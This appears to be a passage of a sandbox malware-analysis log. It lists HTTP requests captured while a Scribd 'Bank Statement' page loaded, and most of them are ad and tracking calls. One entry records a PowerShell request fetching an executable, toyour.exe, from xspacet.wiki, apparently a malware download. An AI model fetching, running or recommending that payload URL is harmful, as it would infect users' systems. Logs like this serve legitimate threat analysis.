Source: global trafficHTTP traffic detected: GET /f?apiKey=2111098132&r=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F806838445%2FBank-Statement HTTP/1.1Host: fid.agkn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47content-type: text/plainAccept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /quant.js HTTP/1.1Host: secure.quantserve.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /track/rid?ttd_pid=6bjin1p&fmt=json HTTP/1.1Host: match.adsrvr.orgConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47content-type: text/plainAccept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /idex/did-0047/any?duid=4b59e25de34b--01jmbynct8prdw2s64049er0q5&did=did-0047&cd=.scribd.com&pu=https%3A%2F%2Fwww.scribd.com&resolve=nonId&resolve=uid2&resolve=index&resolve=bidswitch&resolve=pubmatic&resolve=magnite&resolve=openx&resolve=thetradedesk&resolve=medianet&resolve=triplelift HTTP/1.1Host: idx.liadm.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47content-type: text/plainAccept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /api/v1/pbhid?partner_id=474&_it=prebid&t=1&src=id&domain=www.scribd.com HTTP/1.1Host: id.hadron.ad.gtConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47content-type: text/plainAccept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /tag?h=freestar-io&upapi=true HTTP/1.1Host: btloader.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /f?apiKey=2111098132&r=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F806838445%2FBank-Statement HTTP/1.1Host: fid.agkn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47content-type: text/plainAccept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: OPTIONS /v1/hadron.json?_it=freestar&partner_id=474&sync=0&domain=www.scribd.com&url=https://www.scribd.com/document/806838445/Bank-Statement&v=06 HTTP/1.1Host: id.hadron.ad.gtConnection: keep-aliveAccept: */*Access-Control-Request-Method: GETAccess-Control-Request-Headers: content-typeOrigin: https://www.scribd.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Sec-Fetch-Mode: corsSec-Fetch-Site: cross-siteSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: geo.privacymanager.ioConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/jsonContent-Type: application/jsonsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /cdn/prod/config?src=600&u=https%3A%2F%2Fwww.scribd.com&pubid=0ab198dd-b265-462a-ae36-74e163ad6159 HTTP/1.1Host: c.amazon-adsystem.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /api/v1/u/matches/474?_it=freestar HTTP/1.1Host: a.ad.gtConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /bao-csm/aps-comm/aps_csm.js HTTP/1.1Host: c.amazon-adsystem.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /rules-p-UeXruRVtZz7w6.js HTTP/1.1Host: rules.quantcount.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /configs/0ab198dd-b265-462a-ae36-74e163ad6159 HTTP/1.1Host: config.aps.amazon-adsystem.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /stein/toyour.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: xspacet.wikiConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /lb/v1 HTTP/1.1Host: lb.eu-1-id5-sync.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /websiteconfig?bt_env=prod&o=5714937848528896&w=scribd.com HTTP/1.1Host: btloader.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /inner.html HTTP/1.1Host: m.stripe.networkConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://js.stripe.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /v1/hadron.json?_it=freestar&partner_id=474&sync=0&domain=www.scribd.com&url=https://www.scribd.com/document/806838445/Bank-Statement&v=06 HTTP/1.1Host: id.hadron.ad.gtConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: application/jsonAccept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /favicon.ico?ad=300x250&ad_box_=1&adnet=1&showad=1&size=250x250 HTTP/1.1Host: ad.doubleclick.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /px.gif?ch=2 HTTP/1.1Host: ad-delivery.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /px.gif?ch=1&e=0.04970999037798096 HTTP/1.1Host: ad-delivery.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /api/1.0/id5-api.js HTTP/1.1Host: cdn.id5-sync.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /js/pubcid/latest/pubcid.min.js HTTP/1.1Host: secure.cdn.fastclick.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /ima.js HTTP/1.1Host: cdn-ima.33across.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /bootstrap/bootstrap.js HTTP/1.1Host: cdn.browsiprod.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /hadron.js?partner_id=474&sync=1&url=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F806838445%2FBank-Statement HTTP/1.1Host: cdn.hadronid.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /lt/c/16576/sync.min.js HTTP/1.1Host: tags.crwdcntrl.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /pixel;r=2092930387;labels=title.Bank%20Statement%2Ctitle.Bank%20Statement%20%7C%20PDF%20%7C%20Debit%20Card%20%7C%20Automated%20Teller%20Machine%2Ctitle.Bank%20Statement;rf=0;a=p-UeXruRVtZz7w6;url=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F806838445%2FBank-Statement;ns=0;ce=1;qjs=1;qv=53b98956-20250121164344;ref=;dst=1;et=1739863020757;tzo=300;ogl=site_name.Scribd%2Ctitle.Bank%20Statement%20%7C%20PDF%20%7C%20Debit%20Card%20%7C%20Automated%20Teller%20Machine%2Ctype.website%2Curl.https%3A%2F%2Fwww%252Escribd%252Ecom%2Fdocument%2F806838445%2FBank-Statement%2Ctitle.Bank%20Statement%2Cdescription.Scribd%20is%20the%20world's%20largest%20social%20reading%20and%20publishing%20site%252E%2Cimage.https%3A%2F%2Fimgv2-1-f%252Escribdassets%252Ecom%2Fimg%2Fdocument%2F806838445%2Foriginal%2F9a56996329%2F1%3F%2Cimage%3Aalt.Bank%20Statement%2Cimage%3Awidth.1200%2Cimage%3Aheight.630%2Cimage%3Atype.image%2Fwebp;ses=1df35346-a1f2-4142-bba0-a0239ed727d1;d=scribd.com;uht=2;fpan=1;fpa=P0-761217323-1739863020762;pbc=;gdpr=0;mdl= HTTP/1.1Host: pixel.quantserve.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: POST /g/v2/882.json HTTP/1.1Host: id5-sync.comConnection: keep-aliveContent-Length: 500sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /lb/v1 HTTP/1.1Host: lb.eu-1-id5-sync.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /out-4.5.44.js HTTP/1.1Host: m.stripe.networkConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://m.stripe.network/inner.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /api/v1/p/474 HTTP/1.1Host: p.ad.gtConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /track/cmf/generic?ttd_pid=8gkxb6n&ttd_tpi=1&ttd_puid=AU1D-0100-001739863021-EHT1L4CA-5M76&gdpr=0 HTTP/1.1Host: match.adsrvr.orgConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /profiles_engine/ProfilesEngineServlet?at=39&mi=10&dpi=793790479&pt=17&dpn=1&jsver=5.09&iiqidtype=2&iiqpcid=ae6060b4-7f95-4e11-a45c-624b88212a3a&iiqpciddate=1739863021171&iiqcallcount=0&iiqfailcount=0&iiqnodata=false&iiqlocalstorageenabled=true&tsrnd=526_1739863021172&fbp=137264061&cttl=43200000&rrtt=0&dud=0&abtg=A&iiqppcc=0&vrref=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F806838445%2FBank-Statement&ref=www.scribd.com HTTP/1.1Host: api.intentiq.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /profiles_engine/ProfilesEngineServlet?at=20&mi=10&secure=1&dpi=793790479&rnd=596237&iiqidtype=2&iiqpcid=ae6060b4-7f95-4e11-a45c-624b88212a3a&iiqpciddate=1739863021171&tsrnd=532_1739863021174&fbp=137264061&vrref=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F806838445%2FBank-Statement&jsver=5.09 HTTP/1.1Host: sync.intentiq.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /country?o=5714937848528896 HTTP/1.1Host: api.btloader.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
